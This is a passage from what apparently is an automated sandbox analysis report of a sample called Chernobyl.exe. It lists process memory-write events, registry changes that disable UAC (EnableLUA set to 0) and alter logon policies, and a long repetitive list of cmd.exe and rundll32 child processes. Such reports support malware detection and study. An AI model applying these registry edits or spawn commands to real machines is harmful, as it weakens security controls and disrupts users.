PID 108 wrote to memory of 2040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 108 wrote to memory of 2040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2908 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 1020 wrote to memory of 2020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1020 wrote to memory of 2020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1020 wrote to memory of 2020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2908 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1048 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2872 wrote to memory of 1048 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2872 wrote to memory of 1048 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2908 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2080 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2080 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2080 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2024 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2024 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2024 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2908 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 1208 wrote to memory of 540 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1208 wrote to memory of 540 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1208 wrote to memory of 540 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2908 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2236 wrote to memory of 752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2236 wrote to memory of 752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2236 wrote to memory of 752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2908 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 1416 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1416 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1416 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1404 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1404 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1404 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 336 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 336 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 336 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1784 wrote to memory of 1108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe

"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

